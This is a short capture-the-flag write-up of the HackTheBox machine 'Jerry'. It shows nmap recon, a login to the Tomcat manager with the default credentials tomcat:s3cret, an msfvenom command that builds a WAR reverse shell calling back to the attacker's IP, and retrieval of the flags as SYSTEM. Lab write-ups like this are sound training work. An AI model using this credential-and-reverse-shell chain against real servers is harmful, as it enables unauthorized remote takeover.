Jerry
Write up for the HTB machine 'Jerry'
1. Initial recon
1.1. nmap
nmap -sC -sV 10.10.10.95 -Pn
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
from the nmap scan we can navigate to 10.10.10.95:8080
clicking on the manager page we are prompted to enter some credentials trying the usual
admin:admin
admin:password
...
we are met with a 403 page that contains some default credentials
tomcat:s3cret
surely enough those work when we are prompted to log in again
2. RCE
looking through the manager portal at /manager/html
we can see that there is an option to upload WAR files. we can find a msfvenom
reverse shell for the war file on HackTricks
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
after uploading the file for the reverse shell, and running a netcat listener, we can navigate to /revshell
on the web server to catch it
3. user and root!
a simple whoami
in our rev shell reveals that we are already nt authority\system
so let's just search for our flags
we can find them at C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt
and simply running type "2 for the price of 1.txt"
in the flag directory will reveal both our user and root flags.
Last updated
Was this helpful?